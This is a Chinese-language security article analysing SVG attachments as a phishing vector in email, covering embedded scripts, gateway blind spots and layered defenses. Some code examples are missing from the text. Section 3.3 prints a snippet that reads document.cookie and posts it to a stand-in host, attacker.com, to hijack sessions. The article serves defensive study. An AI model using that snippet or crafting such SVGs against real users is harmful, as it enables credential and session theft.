SVG文件中的隐蔽威胁：电子邮件钓鱼攻击的新载体分析

摘要

近年来，可缩放矢量图形（Scalable Vector Graphics, SVG）因其轻量、可缩放和跨平台兼容等优势，被广泛应用于网页设计与数字通信中。然而，随着其功能扩展，SVG逐渐暴露出安全风险，尤其在电子邮件环境中成为新型钓鱼攻击的高发载体。本文系统分析了SVG作为钓鱼攻击媒介的技术机理，包括其嵌入脚本的能力、绕过传统邮件安全检测的特性，以及攻击者利用该格式实施凭证窃取、会话劫持乃至绕过多因素认证的具体手法。通过对2024年第四季度至2025年第二季度全球多家安全厂商披露数据的整合，本文量化了此类攻击的增长趋势，并结合真实攻击样本还原攻击链。此外，文章提出了针对邮件网关、客户端及终端用户的多层次防御策略，并通过代码示例展示恶意SVG的构造方式与检测逻辑。研究表明，当前主流电子邮件平台对SVG内容缺乏有效管控机制，亟需从协议层、渲染层与策略层协同强化防护能力。

关键词：SVG；钓鱼攻击；电子邮件安全；JavaScript注入；内容过滤；安全策略

1 引言

电子邮件作为企业通信的核心基础设施，长期是网络攻击者的首要目标。传统钓鱼攻击多依赖伪装链接或携带宏病毒的Office文档诱导用户交互，但随着邮件安全网关对附件类型、URL信誉及宏行为的持续强化检测，攻击者不断寻找新的规避路径。在此背景下，SVG文件因其“图像”属性而被多数安全系统默认信任，却具备执行脚本的能力，成为理想的隐蔽攻击载体。

SVG是一种基于XML的矢量图形格式，由万维网联盟（W3C）标准化，支持内联CSS、HTML片段及ECMAScript（即JavaScript）。尽管W3C规范明确指出SVG文档可包含交互式内容，但在实际部署中，许多邮件客户端（如Outlook Web、Apple Mail、Gmail网页版）在解析SVG附件时仍会触发浏览器级渲染引擎，从而执行其中嵌入的脚本。这一特性被攻击者巧妙利用：将钓鱼表单直接嵌入SVG文件，在用户仅打开邮件（无需点击任何链接）的情况下完成凭证收集。

2024年末以来，全球多家网络安全机构相继报告SVG钓鱼攻击案例激增。据Sublime Security统计，2025年第一季度，SVG附件占其检测到的全部钓鱼尝试的1%；而相较于2024年第四季度，相关攻击数量增长达47,000%。另据行业综合数据显示，过去三个月内该类攻击同比增长230%，金融、医疗及法律服务等高价值行业成为主要目标。这些数据表明，SVG钓鱼已非偶发事件，而是演变为一种系统性威胁。

本文旨在深入剖析SVG钓鱼攻击的技术实现路径、传播机制与危害边界，评估现有防御体系的不足，并提出切实可行的缓解措施。全文结构如下：第二部分介绍SVG格式的安全特性与潜在风险；第三部分详细拆解典型攻击流程并辅以代码示例；第四部分分析当前邮件安全生态对SVG的处理盲区；第五部分提出分层防御框架；第六部分总结研究发现并展望未来方向。

SVG phishing

2 SVG格式的安全特性与风险基础

2.1 SVG的技术架构

SVG文件本质上是文本格式的XML文档，描述图形元素（如路径、矩形、文本）及其样式属性。其核心优势在于分辨率无关性与动态交互能力。例如，一个简单的SVG可定义如下：

Click Me

然而，SVG标准允许通过

SecureBank Logo

该SVG在视觉上呈现为银行Logo，但一旦被渲染，即弹出看似官方的登录表单。用户提交后，凭证被编码并通过标签的src属性外传——此技术称为“Beaconing”，可绕过部分CORS限制。

3.3 高级变种：绕过多因素认证（MFA）

部分攻击进一步利用会话令牌窃取实现MFA绕过。例如，若目标使用基于Cookie的会话管理，恶意脚本可读取document.cookie并发送至攻击者服务器。随后，攻击者利用该会话直接登录，无需密码或第二因子。代码片段如下：

const cookies = document.cookie;

fetch('https://attacker.com/exfil', {

method: 'POST',

body: cookies,

mode: 'no-cors' // 规避CORS错误，确保请求发出

尽管no-cors模式下响应不可读，但请求本身足以完成数据外泄。

4 当前邮件安全体系对SVG的处理缺陷

4.1 安全网关的检测盲区

主流邮件安全网关（如Mimecast、Proofpoint）主要依赖以下机制检测恶意附件：

文件扩展名黑名单（如.exe, .js）

静态特征码匹配

沙箱行为分析

然而，SVG文件通常不在黑名单之列，且其XML结构难以通过传统AV引擎识别恶意脚本。即使启用沙箱，若沙箱环境未模拟真实邮件客户端的渲染行为（如禁用JavaScript），则无法触发攻击载荷。

4.2 邮件客户端的不一致处理

不同客户端对SVG的支持与限制差异显著：

值得注意的是，即使Gmail在Web端阻止SVG渲染，其移动端应用或第三方集成（如通过IMAP同步至其他客户端）仍可能导致SVG被执行。

4.3 用户教育的局限性

传统安全意识培训强调“勿点可疑链接”“勿开未知附件”，但SVG文件常以“公司Logo.svg”“Invoice_Q2.svg”等合理命名出现，且无明显危险标识（如.exe的警告图标），用户难以识别。

5 防御策略与缓解措施

5.1 邮件网关层面

扩展附件过滤策略：将.svg加入高风险附件类型，强制转换为静态图像（如PNG）或直接阻断。

内容深度解析：部署支持XML/JavaScript语法分析的检测引擎，识别